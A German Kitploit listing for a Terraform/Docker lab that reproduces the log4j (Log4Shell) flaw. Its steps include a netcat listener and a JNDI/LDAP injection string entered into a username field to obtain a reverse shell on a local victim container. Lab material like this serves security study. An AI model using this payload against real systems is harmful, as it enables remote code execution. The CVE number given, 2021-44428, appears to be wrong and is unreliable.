Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4jtest — Terraform- und Docker-Ressourcen zum schnellen Aufsetzen eines Tests für CVE-2021-44428 | Kitploit
Tools/GitHubGitHub/z3bul0n/log4jtest
Cloud-Infrastruktur-SicherheitContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsLernen & Bildung
GitHubz3bul0n/log4jtest

log4jtest

Terraform- und Docker-Ressourcen zum schnellen Aufsetzen eines Tests für CVE-2021-44428

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Einführung

Dieses Repository ist eingerichtet, um die log4j-Schwachstelle schnell mit Docker und Hashicorp Terraform zu testen. Alle Komponenten dieses Tests laufen in Docker-Containern im Docker-Netzwerk und sind über 'host.docker.internal' erreichbar.

Danksagungen / Haftungsausschluss

Diese Testumgebung basiert auf einem großartigen Blogbeitrag von Raxis: (https://raxis.com/blog/log4j-exploit)

Die verwundbare Anwendung und der Exploit-Code stammen von cyberxml (https://github.com/cyberxml/log4j-poc).

Alles, was ich getan habe, ist, die Umgebung zu kodifizieren, um diesen köstlichen Exploit einfach hochzufahren und zu testen.

Ich übernehme keinerlei Verantwortung für nachteilige Auswirkungen oder böswillige Handlungen, die aus der Nutzung des Materials in diesem Repository resultieren können. Punkt. Es liegt an dir zu entscheiden, ob diese Materialien vertrauenswürdig sind, und es ist ebenso deine Verantwortung, diese Informationen ethisch zu nutzen. Ich poste diese Goodies lediglich, damit Forscher, Studenten und Sicherheitsexperten schnell eine Umgebung erstellen und den Exploit selbst testen können. Seacrest out.

Voraussetzungen

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

Einrichtung

  1. Klone dieses Repository
  2. Führe 'terraform init' im Projektverzeichnis aus
  3. Starte den Docker-Daemon
  4. Führe das Bash-Skript 'docker-build.sh' aus, um alle Container-Images des Projekts zu erstellen.
  5. Führe 'terraform apply' aus, um alle Container im Projekt zu erstellen.

Ausnutzung

  1. Öffne eine Shell im log4j_netcat-Container mit 'docker exec -it netcat /bin/bash' oder etwas Ähnlichem. Hier empfängst du deine Shell-Verbindung zum Opfer-Server, sobald sie hergestellt ist.

  2. Gib in deiner Sitzung im log4j_netcat-Container den folgenden Befehl ein, um den Listener zu starten:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. Navigiere in deinem Browser zu http://host.docker.internal:8080/log4shell/

  2. Gib Folgendes in das Feld 'Username' ein, zusammen mit allem, was du möchtest, im Feld 'Password':

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. Kehre zur Shell des log4j_netcat-Containers zurück und stelle fest, dass du dich mit dem Opfer-Server verbunden hast.

  2. Geh hin und richte Chaos an!

Tool herunterladen